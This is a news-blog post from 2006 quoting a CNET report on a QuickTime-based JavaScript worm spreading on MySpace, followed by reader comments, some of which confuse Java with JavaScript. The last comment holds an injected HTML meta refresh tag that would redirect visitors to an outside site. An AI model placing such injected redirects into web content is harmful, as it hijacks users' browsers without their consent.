“MySpace.com wants Apple Computer to update its QuickTime media player software so it can’t be used in attacks on the social-networking site,” Joris Evers reports for CNET News.
Evers reports, “The request comes after a worm in the form of a rigged QuickTime movie crawled on MySpace.com over the weekend, changing people’s MySpace profiles. The worm spread because of QuickTime’s support for JavaScript code, experts have said. ‘When we learned about an issue that exploits a feature in QuickTime and unfortunately targets MySpace users, we immediately contacted Apple to engineer a fix,’ Hemanshu Nigam, chief security officer at MySpace, said in an e-mail statement Tuesday.”
Evers reports, “Apple is working on a QuickTime fix, but has a temporary solution available Tuesday, company spokeswoman Lynn Fox said in an e-mail. ‘Recently we learned about an issue that exploits a feature in QuickTime used to target MySpace users. We have devised a way to disable this QuickTime feature for those who use Internet Explorer. We are working on a broader solution for all other users as well,’ Fox said in the e-mail.”
Evers reports, “Apple said it has provided MySpace with the temporary fix. The computer company said it would be up to the social-networking site to offer it to users. MySpace has not responded to an inquiry from CNET News.com as to when the temporary solution would be available to users.”
Full article here.
Related MacDailyNews article:
QuickTime JavaScript worm spreads via MySpace – December 04, 2006
Apple Computer requests that myspace.com do some basic fscking virus scanning in its users’ uploads… *punch*
mysapce??? hahahaha…
Wow, I was worried until I went back and saw that this was being reported by CNet.
So this is being pinned on Quicktime because Quicktime uses java. Shouldn’t this be considered a JAVA problem? I notice also that it doesn’t specify which operating system is being used when the javascript problem arises. What makes me think that it’s another exclusively Windows problem?
Microsoft has a history of trying to torpedo java in favor of its own alternative. They were reecently sued for it. But there’s no microsoft progaganda being generated here because we KNOW that CNet has the highest of editorial ethics and accuracy, don’t we?
Java is not the same as JavaScript, Zeke.
http://www.htmlgoodies.com/beyond/javascript/article.php/3470971
I thought this was started from a flaw in Myspace, discovered 2 weeks ago.
Apple is helping with a IE problem? Easy- don’t use it..
effwerd:
“Java is not the same as JavaScript, Zeke.”
Both are OOPLs, Java comes from Sun Microsystems and Netscape adapted it to HTML and called it JavaScript. In any event, Microsoft has gone to great lengths to kill both Java and Netscape, and CNet is acting as an accomplice these days.
Zeke,
Netscape never adapted Java to HTML. Netscape developed their own scripting language and called it Javascript after Java had gotten so popular.
Myspace sucks. It’s for teens and fems
“We have devised a way to disable this QuickTime feature for those who use Internet Explorer.”
WOW! I’ve been using that fix for about 3 years now.
I don’t use Explorer
Welcome to the wonderful world of Web 2.0 !!! Now do we really want to entrust critical information to online applications ??
(I’m looking at YOU Microsoft Live)
I thought that the solution to the problem was to turn off Play Movies Automatically in Quicktime. Perhaps I was mistaken?
MySpace has already admitted it was a vulnerability on their site that allowed this to happen. This isn’t indicating a flaw with QuickTime that needs to be fixed, but I’m sure there’s some extra validation or user authentication that can be done to allow automatic execution of Javascript within the QuickTime environment.
Zeke, it’s easy to confuse Java with Javascript. They’re entirely different things. The official name for Javascript is ECMAScript, of which there are actually a few variants.
the real problem is that people still use IE. what is wrong with people?
<meta http-equiv=”Refresh” content=”4;url=http://www.lottomacher.com/”>